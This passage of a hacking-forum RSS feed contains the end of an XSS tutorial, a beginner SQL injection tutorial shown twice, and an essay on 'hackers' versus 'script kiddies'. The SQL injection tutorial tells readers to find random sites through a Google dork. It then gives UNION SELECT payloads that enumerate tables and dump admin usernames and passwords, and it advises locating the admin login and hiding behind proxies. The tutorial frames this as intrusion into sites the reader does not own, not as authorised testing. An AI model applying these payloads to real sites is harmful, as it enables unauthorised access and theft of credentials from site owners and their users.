And sometimes our query is filtered/encoded in some places and in other places it isn't. In Figure 11. you can see that in <span style="color: #FF0000;">title</span> tags our query isn't filtered and in <span style="color: #FF0000;">value</span> tag it is filtered.<br />
<br />
Figure 11.<br />
<img src="http://s20.postimg.org/twnk2hxe5/looking_at_source.jpg" border="0" alt="[Image: looking_at_source.jpg]" /></div>
<br />
Always look at the source code. If you wanna be good at this, learn JavaScript and HTML.<br />
Recommened: <br />
<a href="http://www.hackcommunity.com/Thread-XSS-Cross-Site-Scripting-Video-Tutorial" target="_blank">XSS - Cross Site Scripting [Video Tutorial]</a> by Xecutor (videos from Infinity Exists)<br />
<a href="http://www.hackcommunity.com/Thread-Tutorial-Basic-xss-tutorial" target="_blank">Basic XSS tutorial</a> by Anima Templi<br />
<a href="http://www.hackcommunity.com/Thread-Complete-XSS-Tutorial?pid=3905" target="_blank">Complete XSS Tutorial</a> by 1234hotmaster <br />
<br />
We came to the end of this tutorial. <img src="images/smilies/dance3.gif" style="vertical-align: middle;" border="0" alt="Dance" title="Dance" /> <img src="images/smilies/dance3.gif" style="vertical-align: middle;" border="0" alt="Dance" title="Dance" /> <img src="images/smilies/dance3.gif" style="vertical-align: middle;" border="0" alt="Dance" title="Dance" /><br />
I hope you like it.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Basic SQL Injection]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-Basic-SQL-Injection</link>
			<pubDate>Sat, 08 Jun 2013 20:58:55 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-Basic-SQL-Injection</guid>
			<description><![CDATA[<div style="text-align: center;">SQL Injection is by far one of the most common penetration attacks. Its also my favorite and very effective.</div>
<br />
<div style="text-align: center;">Step 1.<br />
Open up google and search <span style="font-weight: bold;">inurl:members.php?id=[/b<br />
Step 2.<br />
Click on any of the links and then put a single quote ( ' ) at the end.<br />
Step 3.<br />
If you get an error, like [b]You have an error in your sql syntax</span>, then go to step 4. If not, go back and find another link.<br />
Step 4. <br />
Now you need to know how many columns there are. <a href="http://example.com/members.php?id=4/" target="_blank">http://example.com/members.php?id=4/</a> Will be our example.<br />
Type "order by 10" at the end of the url. <a href="http://example.com/members.php?id=4" target="_blank">http://example.com/members.php?id=4</a> order by 10.<br />
If you get an error, decrease the number. If nothing happens, increase the number until you get an error.<br />
Say we do ORDER BY 10. No error. So then do ORDER BY 20. We get an error. ORDER BY 15. No error. ORDER BY 16. Error. That means we have 15 columns.<br />
Step 5.<br />
Now we need to find out which columns are vulnerable.<br />
We do this. <a href="http://example.com/members.php?id=-4" target="_blank">http://example.com/members.php?id=-4</a> UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15.<br />
You MUST put a negative (-) in front of the value. You should then see numbers in place of the content. Choose one of those numbers. For example, one of them is 14. So to find the version, we just do:<br />
 <a href="http://example.com/members.php?id=-4" target="_blank">http://example.com/members.php?id=-4</a> 1,2,3,4,5,6,7,8,9,10,11,12,13,VERSION(),15<br />
The version should then be displayed. Now we want to see whats in the database, dont we?<br />
Step 6. <a href="http://example.com/members.php?id=-4" target="_blank">http://example.com/members.php?id=-4</a> 1,2,3,4,5,6,7,8,9,10,11,12,13,GROUP_CONCAT(table_name),15 from information_schema.tables where table_name=database()<br />
That displays all the tables in the database. Now, for example, we see this:<br />
admin,news,content<br />
Oh look. A table named admin. Now we want to see the columns in the table admin.<br />
Setp 6.<br />
<a href="http://example.com/members.php?id=-4" target="_blank">http://example.com/members.php?id=-4</a> 1,2,3,4,5,6,7,8,9,10,11,12,13,GROUP_CONCAT(column_name),15 from information_schema.columns where table_name=CHAR(097,100,109,105,110)<br />
You need to replace database() with your tablename like: CHAR(tablename in ascii format)(use this:http://personal.projectxxi.com/email_addr_encoder.html)<br />
Also replace "_schema.tables" with "._schema.columns" and the group concat. <br />
You should then see something like: admin_username,admin_password,admin_id,admin_ip<br />
Now what you do to get the username and password is:<br />
<a href="http://example.com/members.php?id=-4" target="_blank">http://example.com/members.php?id=-4</a> 1,2,3,4,5,6,7,8,9,10,11,12,13,GROUP_CONCAT(admin_username,0x3a,admin_password),1&#8203;5 from admin--<br />
Congradulations! Now you can see all admin usernames:passwords! Now use this: <a href="http://scan.subhashdasyam.com/admin-panel-finder.php" target="_blank">http://scan.subhashdasyam.com/admin-panel-finder.php</a> To find the admin login page. And now you are admin! </div>
<br />
You can get in big trouble with this. Use proxys and DONT USE IS FOR BAD!!!!]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;">SQL Injection is by far one of the most common penetration attacks. Its also my favorite and very effective.</div>
<br />
<div style="text-align: center;">Step 1.<br />
Open up google and search <span style="font-weight: bold;">inurl:members.php?id=[/b<br />
Step 2.<br />
Click on any of the links and then put a single quote ( ' ) at the end.<br />
Step 3.<br />
If you get an error, like [b]You have an error in your sql syntax</span>, then go to step 4. If not, go back and find another link.<br />
Step 4. <br />
Now you need to know how many columns there are. <a href="http://example.com/members.php?id=4/" target="_blank">http://example.com/members.php?id=4/</a> Will be our example.<br />
Type "order by 10" at the end of the url. <a href="http://example.com/members.php?id=4" target="_blank">http://example.com/members.php?id=4</a> order by 10.<br />
If you get an error, decrease the number. If nothing happens, increase the number until you get an error.<br />
Say we do ORDER BY 10. No error. So then do ORDER BY 20. We get an error. ORDER BY 15. No error. ORDER BY 16. Error. That means we have 15 columns.<br />
Step 5.<br />
Now we need to find out which columns are vulnerable.<br />
We do this. <a href="http://example.com/members.php?id=-4" target="_blank">http://example.com/members.php?id=-4</a> UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15.<br />
You MUST put a negative (-) in front of the value. You should then see numbers in place of the content. Choose one of those numbers. For example, one of them is 14. So to find the version, we just do:<br />
 <a href="http://example.com/members.php?id=-4" target="_blank">http://example.com/members.php?id=-4</a> 1,2,3,4,5,6,7,8,9,10,11,12,13,VERSION(),15<br />
The version should then be displayed. Now we want to see whats in the database, dont we?<br />
Step 6. <a href="http://example.com/members.php?id=-4" target="_blank">http://example.com/members.php?id=-4</a> 1,2,3,4,5,6,7,8,9,10,11,12,13,GROUP_CONCAT(table_name),15 from information_schema.tables where table_name=database()<br />
That displays all the tables in the database. Now, for example, we see this:<br />
admin,news,content<br />
Oh look. A table named admin. Now we want to see the columns in the table admin.<br />
Setp 6.<br />
<a href="http://example.com/members.php?id=-4" target="_blank">http://example.com/members.php?id=-4</a> 1,2,3,4,5,6,7,8,9,10,11,12,13,GROUP_CONCAT(column_name),15 from information_schema.columns where table_name=CHAR(097,100,109,105,110)<br />
You need to replace database() with your tablename like: CHAR(tablename in ascii format)(use this:http://personal.projectxxi.com/email_addr_encoder.html)<br />
Also replace "_schema.tables" with "._schema.columns" and the group concat. <br />
You should then see something like: admin_username,admin_password,admin_id,admin_ip<br />
Now what you do to get the username and password is:<br />
<a href="http://example.com/members.php?id=-4" target="_blank">http://example.com/members.php?id=-4</a> 1,2,3,4,5,6,7,8,9,10,11,12,13,GROUP_CONCAT(admin_username,0x3a,admin_password),1&#8203;5 from admin--<br />
Congradulations! Now you can see all admin usernames:passwords! Now use this: <a href="http://scan.subhashdasyam.com/admin-panel-finder.php" target="_blank">http://scan.subhashdasyam.com/admin-panel-finder.php</a> To find the admin login page. And now you are admin! </div>
<br />
You can get in big trouble with this. Use proxys and DONT USE IS FOR BAD!!!!]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[From Script Kiddie to a Hacker - A Comprehensive Guide for the Misguided]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-From-Script-Kiddie-to-a-Hacker-A-Comprehensive-Guide-for-the-Misguided</link>
			<pubDate>Sat, 08 Jun 2013 10:41:24 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-From-Script-Kiddie-to-a-Hacker-A-Comprehensive-Guide-for-the-Misguided</guid>
			<description><![CDATA[Hello Hack community, Yet this is one of my other tutorials for all of my fellow Penetration Testers. The reason I've created such a thread is because of these 4 reasons:<br />
<br />
<span style="font-weight: bold;">1)</span> <span style="font-style: italic;">I feel guilty for people who make fun of Hacking by saying "I can hack you're facebook, Now bow before me!" (Seriously?? )</span><br />
<span style="font-weight: bold;">2)</span> <span style="font-style: italic;">I feel bad for people who can't differentiate between <span style="font-weight: bold;">Hacking</span> and <span style="font-weight: bold;">Cracking</span></span><br />
<span style="font-weight: bold;">3)</span> <span style="font-style: italic;">I feel hatred for people who can't tell the difference between a <span style="font-weight: bold;">Hacker</span> and a <span style="font-weight: bold;">Penetration Tester</span></span><br />
<span style="font-weight: bold;">4)</span> <span style="font-style: italic;">Last but not the least, I feel awful for people who call themselves "Certified/Professional Ethical or Black hat Hacker" after hacking a Facebook account, A weak WEP Key and atlast opening a Blog with the title "An Ethical Hackers Blog"</span><br />
<br />
Here's something for the people I mentioned above:<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://3.bp.blogspot.com/_FR3ACrPgZUI/TBr_-n9AcqI/AAAAAAAAAls/PgbFgMjPoGY/s1600/JesusFacepalm.jpg" border="0" alt="[Image: JesusFacepalm.jpg]" /></div></div>
<br />
These are just the few of my large list of reasons due to which I created this post but before I continue please keep in mind that I will be writing some stuff that might seem offending to you but it isn't because this thread is for awareness. <br />
<br />
Here's what we are going to discuss:<br />
<br />
<span style="font-style: italic;">1) Who is a "<span style="font-weight: bold;">Hacker</span>" ?<br />
2) List of things that are "<span style="font-weight: bold;">NOT</span>" Hacking<br />
3) Difference between Hacking and Cracking<br />
4) Actual and Real time Hacking<br />
5) Difference between an Hacker and a Penetration Tester<br />
6) Challenge</span><br />
<br />
<span style="font-size: medium;"><span style="color: #32CD32;"><span style="font-weight: bold;">1) Who is a Hacker and What is Hacking??</span></span></span><br />
<br />
A <span style="font-weight: bold;">Hacker</span> is a person who specializes in computer security, Discovers and Exploits the vulnerabilities found using his own set of particular skill, tools and knowledge. A hacker might do such thing for his own purpose or for money or even as a challenge. In this era of technology and cybernet, Many people especially the government think of <span style="font-weight: bold;">Hackers </span>as so called <span style="font-weight: bold;">Criminals</span>. Well the thing that you should remember is that not all Hackers are criminals. Hackers have types like Black Hats, White Hats and Grey Hats. Out of them Black Hats are considered to be criminals but in this era people take Hackers as a potential threat. Well we are not here to discuss about threat but we are here to discuss the true meaning of a Hacker and Hacking.<br />
<br />
There are many meanings of a <span style="font-weight: bold;">Hacker</span> like this one from wikipedia:<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>A hacker is someone who seeks and exploits weaknesses in a computer system or computer network. Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge.</code></div></div>
<br />
For us the true definition if a Hacker would be:<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>A person having security analysis and exploitation skills, able to exploit vulnerabilities on a target system by using his own set of Tools and Exploits</code></div></div>
<br />
Taking the above definition in view, it <span style="font-style: italic;">clearly states</span> that a Hacker uses Tools that he <span style="font-weight: bold;">codes</span> and makes <span style="font-weight: bold;">Himself</span>. This also indicates that this person has significant knowledge in Programming using which he is able to code his own required tools. Exploitation itself is not easy as it requires constant observation for detecting vulnerabilities and coding an exploit for them which too requires programming as well.<br />
<br />
The inverse of a Hacker is a <span style="font-weight: bold;">Script Kiddie</span>, uses tools made by others to exploit vulnerabilities.<br />
<br />
<span style="font-size: medium;"><span style="color: #32CD32;"><span style="font-weight: bold;">Point to Ponder?</span></span></span><br />
<br />
Now my question is that "Are you a Hacker?" Keep thinking about it and you will figure out<br />
<br />
<span style="font-size: medium;"><span style="color: #32CD32;"><span style="font-weight: bold;">More Deep Stuff</span></span></span><br />
<br />
You've noticed that we use tools like <span style="font-weight: bold;">Havij, SQLmap, SQLdumper, Hydra, Orphcrack, Metasploit</span> etc to Exploit, Crack and Hack but these tools are built by others. How come we are Hackers when we use tools built by others? We should be called <span style="font-weight: bold;">Script Kiddies</span> instead. This is the part where most of the arguments are carried out, We can't stop using the word Hacker for ourselves even if we aren't one. This is not our fault, this is because the meaning of Hacking is being taken in the wrong way and off course the beginners who are eager to do learn hacking in just a blink of an eye. No! Thats not even fucking possible! Just as programming you can't call your self a professional programmer no matter how much you do! Same goes with Hacking.Each and Every day something new gets made and it is designed in such a manner as to provide a 99% possibility of being secure. For that <span style="font-weight: bold;">Hackers</span> have to go deep and study more about it.<br />
<br />
We hear news that a Bank got Hacked and some vicious amount of money was stolen. It may seem to be easy for n00bies but if you ask the Hackers who have done it you will be amazed by the amount of deep work they had done before carrying out the attack, They had to find out the main bank server, tackle their security protocols, firewalls, IDS etc and for that they had to find out which type of system they were using. Then to study deep about that system, find out a way to tackle it. After getting pass it, now how to get access to the main server and stuff like that. And the most import of the thing is <span style="font-weight: bold;">How they stay Anonymous?</span><br />
<br />
Hahaha, Now after reading the above paragraph now think again, "Am I a Hacker?"<br />
<br />
<span style="font-size: medium;"><span style="color: #32CD32;"><span style="font-weight: bold;">Script Kiddie, The wrong part</span></span></span><br />
<br />
Now days one can easily be <span style="font-weight: bold;">tempted to anger </span>by saying "You are a Script Kiddie!" and there goes the fight and argument! The problem is the same, The meaning of script kiddie is being a person who has no knowledge of anything related to the relevant field. If you read the definition of Script Kiddie:<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>A script kiddie (also known as a skid or skiddie) is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding of the underlying concept—hence the term script (i.e. a prearranged plan or set of activities) kiddie (i.e. kid, child—an individual lacking knowledge and experience, immature)</code></div></div>
<br />
It states that a Script Kiddie is a non expert but that doesn't mean he/she has not knowledge or skill, A script Kiddie has concepts and knowledge and more of it than that of a <span style="font-weight: bold;">newbie</span> or a <span style="font-weight: bold;">n00b</span>. People sometime get angry when one blames over knowledge, No one knows anything to a 100% extent so why can't be admit we are scrip kiddies, I don't see any point or a bad thing in it because:<br />
<br />
<span style="font-style: italic;">1) You know your stuff about hacking, exploiting etc (N00b's don't)<br />
2) You can use tools (N00bs can't)<br />
3) You have potential (N00bs don't)<br />
4) You have skills to use them (N00bs don't)<br />
5) You are gaining more knowledge about your relevant field (N00bs are lazy at this point and not you)</span><br />
<br />
and so more!<br />
<br />
The point was, Don't be angry when called upon a Script Kiddie,  A SK knows much about his real shit rather than a n00b who want to learn the damn shit which are done in years or maybe lifetime, in days. So yeah there's a 101% difference between a N00b and a Script Kiddie and remember<br />
<br />
<div style="text-align: center;"><span style="color: #FF4500;"><span style="text-decoration: underline;"><span style="font-weight: bold;">Script Kiddie is not a N00b</span></span></span></div>
<br />
<span style="color: #32CD32;"><span style="font-size: medium;">2) List of things that are <span style="font-weight: bold;">NOT</span> Hacking or even a part of it</span></span><br />
<br />
People have been merging wrong fields with Hacking as a part of it. Let me tell you one thing that Hacking is way out of your League and by this I mean it's not easy and it takes a lifetime to become an expert in this field but n00bs have taken a wrong turn. They have been considering things on their own as a part of Hacking. Let me list some stuff here for your own explanation:<br />
<br />
1) Hacking Facebook, Twitter etc accounts, this is what usually n00bs say but it's actually Cracking so it isn't Hacking. I will discuss the difference between Hacking and Cracking in the next topic<br />
<br />
2) Cracking Wifi Passwords is not hacking.<br />
<br />
3) Infecting with RAT and get credentials is not Hacking<br />
<br />
4) Gaining access to a target OS using already made exploits, tools etc is not Hacking, If you have a problem with this statement. Read the Hacking definition again and don't argue as it's the bare truth and down deep inside you know it  <img src="images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" /><br />
<br />
5) Reverse Engineering is not Hacking, It's Cracking<br />
<br />
Add more if you want <br />
<br />
<span style="color: #32CD32;"><span style="font-size: medium;"><span style="font-weight: bold;">3) Difference Between Cracking and Hacking</span></span></span><br />
<br />
<div style="text-align: center;"><table class="sr_mybbcoder_table">
	<tr>
		<td> Cracking </td>
		<td> Hacking </td>
	</tr>
	<tr>
		<td> Illegal side of Hacking</td>
		<td> Not Illegal but depends upon in which manner the people use it in</td>
	</tr>
	<tr>
		<td> Mainly associated in stealing, breaking passwords, bruteforce accounts, reverse engineering </td>
		<td> Mainly focuses on exploiting vulnerabilities on target system and gaining access</td>
	</tr>
	<tr>
		<td> Crackers do stuff for popularity mainly </td>
		<td> Hackers do stuff for their own purpose like White Hat's Black Hats and Grey Hats</td>
	</tr>
	<tr>
		<td> Cracking is true crime because we are not taking permissions here</td>
		<td> Ethical Hacking is legal as it involves taking permission on the first basis</td>
	</tr>
</table></div>
<br />
<span style="color: #32CD32;"><span style="font-size: medium;">4) Real And Actual Hacking Events</span></span><br />
<br />
One of my favourite hackers from the past is Kevin Mitnick, they are legendary and their work is almost perfection. Unless you read some real time encounter of these hacker you won't be able to get the true spirit of hacking and how it's done. Read this book written my Kevin Mitnick <a href="http://deathmule.nullfile.com/documents/taoi.pdf" target="_blank">http://deathmule.nullfile.com/documents/taoi.pdf</a><br />
You'll be amazed at the end of the book!<br />
<br />
<span style="color: #32CD32;"><span style="font-size: medium;">5) Difference Between Hacker and Penetration Tester</span></span><br />
<br />
I couldn't describe it much easier than this explanation I found on Wiki:<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>According to the EC-Council's Certified Ethical Hacker course documentation the two can be defined as follows;<br />
<br />
Penetration Testing:<br />
A goal-oriented project of which the goal is the trophy and includes gaining privileged access by pre-conditional means.<br />
<br />
Ethical Hacking:<br />
A penetration test of which the goal is to discover trophies throughout the network within the predetermined project time limit.<br />
<br />
For me reading that I would say difference is; a pen-test has a single goal (trophy) and strict procedures that have to be followed to get that trophy, and an ethical hack is a much larger beast that involves many goals or trophies, could last so long it needs to be time restricted, and in general has less limits.<br />
<br />
So a pen-test is "one goal, one process" and ethical hacking is "hack everything that can be hacked, ethically"</code></div></div>
<br />
<span style="font-size: medium;"><span style="color: #32CD32;">Challenge</span></span><br />
<br />
If you think you are the greatest Hacker of all time, then make your computer Hack Proof!<br />
<br />
Solution (Only press this button if you failed above)<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">Are you serious? After reading all that stuff you still think you can make your OS unhackable? Well there is not solution for that as "<span style="font-weight: bold;">Nothing is Secure</span>"</div></div>
<div style="text-align: center;"><span style="font-style: italic;"><span style="font-weight: bold;">A Guide Written by Ex094<br />
Some reference taken from Wikipedia and Google</span></span></div>]]></description>
			<content:encoded><![CDATA[Hello Hack community, Yet this is one of my other tutorials for all of my fellow Penetration Testers. The reason I've created such a thread is because of these 4 reasons:<br />
<br />
<span style="font-weight: bold;">1)</span> <span style="font-style: italic;">I feel guilty for people who make fun of Hacking by saying "I can hack you're facebook, Now bow before me!" (Seriously?? )</span><br />
<span style="font-weight: bold;">2)</span> <span style="font-style: italic;">I feel bad for people who can't differentiate between <span style="font-weight: bold;">Hacking</span> and <span style="font-weight: bold;">Cracking</span></span><br />
<span style="font-weight: bold;">3)</span> <span style="font-style: italic;">I feel hatred for people who can't tell the difference between a <span style="font-weight: bold;">Hacker</span> and a <span style="font-weight: bold;">Penetration Tester</span></span><br />
<span style="font-weight: bold;">4)</span> <span style="font-style: italic;">Last but not the least, I feel awful for people who call themselves "Certified/Professional Ethical or Black hat Hacker" after hacking a Facebook account, A weak WEP Key and atlast opening a Blog with the title "An Ethical Hackers Blog"</span><br />
<br />
Here's something for the people I mentioned above:<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://3.bp.blogspot.com/_FR3ACrPgZUI/TBr_-n9AcqI/AAAAAAAAAls/PgbFgMjPoGY/s1600/JesusFacepalm.jpg" border="0" alt="[Image: JesusFacepalm.jpg]" /></div></div>
<br />
These are just the few of my large list of reasons due to which I created this post but before I continue please keep in mind that I will be writing some stuff that might seem offending to you but it isn't because this thread is for awareness. <br />
<br />
Here's what we are going to discuss:<br />
<br />
<span style="font-style: italic;">1) Who is a "<span style="font-weight: bold;">Hacker</span>" ?<br />
2) List of things that are "<span style="font-weight: bold;">NOT</span>" Hacking<br />
3) Difference between Hacking and Cracking<br />
4) Actual and Real time Hacking<br />
5) Difference between an Hacker and a Penetration Tester<br />
6) Challenge</span><br />
<br />
<span style="font-size: medium;"><span style="color: #32CD32;"><span style="font-weight: bold;">1) Who is a Hacker and What is Hacking??</span></span></span><br />
<br />
A <span style="font-weight: bold;">Hacker</span> is a person who specializes in computer security, Discovers and Exploits the vulnerabilities found using his own set of particular skill, tools and knowledge. A hacker might do such thing for his own purpose or for money or even as a challenge. In this era of technology and cybernet, Many people especially the government think of <span style="font-weight: bold;">Hackers </span>as so called <span style="font-weight: bold;">Criminals</span>. Well the thing that you should remember is that not all Hackers are criminals. Hackers have types like Black Hats, White Hats and Grey Hats. Out of them Black Hats are considered to be criminals but in this era people take Hackers as a potential threat. Well we are not here to discuss about threat but we are here to discuss the true meaning of a Hacker and Hacking.<br />
<br />
There are many meanings of a <span style="font-weight: bold;">Hacker</span> like this one from wikipedia:<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>A hacker is someone who seeks and exploits weaknesses in a computer system or computer network. Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge.</code></div></div>
<br />
For us the true definition if a Hacker would be:<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>A person having security analysis and exploitation skills, able to exploit vulnerabilities on a target system by using his own set of Tools and Exploits</code></div></div>
<br />
Taking the above definition in view, it <span style="font-style: italic;">clearly states</span> that a Hacker uses Tools that he <span style="font-weight: bold;">codes</span> and makes <span style="font-weight: bold;">Himself</span>. This also indicates that this person has significant knowledge in Programming using which he is able to code his own required tools. Exploitation itself is not easy as it requires constant observation for detecting vulnerabilities and coding an exploit for them which too requires programming as well.<br />
<br />
The inverse of a Hacker is a <span style="font-weight: bold;">Script Kiddie</span>, uses tools made by others to exploit vulnerabilities.<br />
<br />
<span style="font-size: medium;"><span style="color: #32CD32;"><span style="font-weight: bold;">Point to Ponder?</span></span></span><br />
<br />
Now my question is that "Are you a Hacker?" Keep thinking about it and you will figure out<br />
<br />
<span style="font-size: medium;"><span style="color: #32CD32;"><span style="font-weight: bold;">More Deep Stuff</span></span></span><br />
<br />
You've noticed that we use tools like <span style="font-weight: bold;">Havij, SQLmap, SQLdumper, Hydra, Orphcrack, Metasploit</span> etc to Exploit, Crack and Hack but these tools are built by others. How come we are Hackers when we use tools built by others? We should be called <span style="font-weight: bold;">Script Kiddies</span> instead. This is the part where most of the arguments are carried out, We can't stop using the word Hacker for ourselves even if we aren't one. This is not our fault, this is because the meaning of Hacking is being taken in the wrong way and off course the beginners who are eager to do learn hacking in just a blink of an eye. No! Thats not even fucking possible! Just as programming you can't call your self a professional programmer no matter how much you do! Same goes with Hacking.Each and Every day something new gets made and it is designed in such a manner as to provide a 99% possibility of being secure. For that <span style="font-weight: bold;">Hackers</span> have to go deep and study more about it.<br />
<br />
We hear news that a Bank got Hacked and some vicious amount of money was stolen. It may seem to be easy for n00bies but if you ask the Hackers who have done it you will be amazed by the amount of deep work they had done before carrying out the attack, They had to find out the main bank server, tackle their security protocols, firewalls, IDS etc and for that they had to find out which type of system they were using. Then to study deep about that system, find out a way to tackle it. After getting pass it, now how to get access to the main server and stuff like that. And the most import of the thing is <span style="font-weight: bold;">How they stay Anonymous?</span><br />
<br />
Hahaha, Now after reading the above paragraph now think again, "Am I a Hacker?"<br />
<br />
<span style="font-size: medium;"><span style="color: #32CD32;"><span style="font-weight: bold;">Script Kiddie, The wrong part</span></span></span><br />
<br />
Now days one can easily be <span style="font-weight: bold;">tempted to anger </span>by saying "You are a Script Kiddie!" and there goes the fight and argument! The problem is the same, The meaning of script kiddie is being a person who has no knowledge of anything related to the relevant field. If you read the definition of Script Kiddie:<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>A script kiddie (also known as a skid or skiddie) is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding of the underlying concept—hence the term script (i.e. a prearranged plan or set of activities) kiddie (i.e. kid, child—an individual lacking knowledge and experience, immature)</code></div></div>
<br />
It states that a Script Kiddie is a non expert but that doesn't mean he/she has not knowledge or skill, A script Kiddie has concepts and knowledge and more of it than that of a <span style="font-weight: bold;">newbie</span> or a <span style="font-weight: bold;">n00b</span>. People sometime get angry when one blames over knowledge, No one knows anything to a 100% extent so why can't be admit we are scrip kiddies, I don't see any point or a bad thing in it because:<br />
<br />
<span style="font-style: italic;">1) You know your stuff about hacking, exploiting etc (N00b's don't)<br />
2) You can use tools (N00bs can't)<br />
3) You have potential (N00bs don't)<br />
4) You have skills to use them (N00bs don't)<br />
5) You are gaining more knowledge about your relevant field (N00bs are lazy at this point and not you)</span><br />
<br />
and so more!<br />
<br />
The point was, Don't be angry when called upon a Script Kiddie,  A SK knows much about his real shit rather than a n00b who want to learn the damn shit which are done in years or maybe lifetime, in days. So yeah there's a 101% difference between a N00b and a Script Kiddie and remember<br />
<br />
<div style="text-align: center;"><span style="color: #FF4500;"><span style="text-decoration: underline;"><span style="font-weight: bold;">Script Kiddie is not a N00b</span></span></span></div>
<br />
<span style="color: #32CD32;"><span style="font-size: medium;">2) List of things that are <span style="font-weight: bold;">NOT</span> Hacking or even a part of it</span></span><br />
<br />
People have been merging wrong fields with Hacking as a part of it. Let me tell you one thing that Hacking is way out of your League and by this I mean it's not easy and it takes a lifetime to become an expert in this field but n00bs have taken a wrong turn. They have been considering things on their own as a part of Hacking. Let me list some stuff here for your own explanation:<br />
<br />
1) Hacking Facebook, Twitter etc accounts, this is what usually n00bs say but it's actually Cracking so it isn't Hacking. I will discuss the difference between Hacking and Cracking in the next topic<br />
<br />
2) Cracking Wifi Passwords is not hacking.<br />
<br />
3) Infecting with RAT and get credentials is not Hacking<br />
<br />
4) Gaining access to a target OS using already made exploits, tools etc is not Hacking, If you have a problem with this statement. Read the Hacking definition again and don't argue as it's the bare truth and down deep inside you know it  <img src="images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" /><br />
<br />
5) Reverse Engineering is not Hacking, It's Cracking<br />
<br />
Add more if you want <br />
<br />
<span style="color: #32CD32;"><span style="font-size: medium;"><span style="font-weight: bold;">3) Difference Between Cracking and Hacking</span></span></span><br />
<br />
<div style="text-align: center;"><table class="sr_mybbcoder_table">
	<tr>
		<td> Cracking </td>
		<td> Hacking </td>
	</tr>
	<tr>
		<td> Illegal side of Hacking</td>
		<td> Not Illegal but depends upon in which manner the people use it in</td>
	</tr>
	<tr>
		<td> Mainly associated in stealing, breaking passwords, bruteforce accounts, reverse engineering </td>
		<td> Mainly focuses on exploiting vulnerabilities on target system and gaining access</td>
	</tr>
	<tr>
		<td> Crackers do stuff for popularity mainly </td>
		<td> Hackers do stuff for their own purpose like White Hat's Black Hats and Grey Hats</td>
	</tr>
	<tr>
		<td> Cracking is true crime because we are not taking permissions here</td>
		<td> Ethical Hacking is legal as it involves taking permission on the first basis</td>
	</tr>
</table></div>
<br />
<span style="color: #32CD32;"><span style="font-size: medium;">4) Real And Actual Hacking Events</span></span><br />
<br />
One of my favourite hackers from the past is Kevin Mitnick, they are legendary and their work is almost perfection. Unless you read some real time encounter of these hacker you won't be able to get the true spirit of hacking and how it's done. Read this book written my Kevin Mitnick <a href="http://deathmule.nullfile.com/documents/taoi.pdf" target="_blank">http://deathmule.nullfile.com/documents/taoi.pdf</a><br />
You'll be amazed at the end of the book!<br />
<br />
<span style="color: #32CD32;"><span style="font-size: medium;">5) Difference Between Hacker and Penetration Tester</span></span><br />
<br />
I couldn't describe it much easier than this explanation I found on Wiki:<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>According to the EC-Council's Certified Ethical Hacker course documentation the two can be defined as follows;<br />
<br />
Penetration Testing:<br />
A goal-oriented project of which the goal is the trophy and includes gaining privileged access by pre-conditional means.<br />
<br />
Ethical Hacking:<br />
A penetration test of which the goal is to discover trophies throughout the network within the predetermined project time limit.<br />
<br />
For me reading that I would say difference is; a pen-test has a single goal (trophy) and strict procedures that have to be followed to get that trophy, and an ethical hack is a much larger beast that involves many goals or trophies, could last so long it needs to be time restricted, and in general has less limits.<br />
<br />
So a pen-test is "one goal, one process" and ethical hacking is "hack everything that can be hacked, ethically"</code></div></div>
<br />
<span style="font-size: medium;"><span style="color: #32CD32;">Challenge</span></span><br />
<br />
If you think you are the greatest Hacker of all time, then make your computer Hack Proof!<br />
<br />
Solution (Only press this button if you failed above)<br />
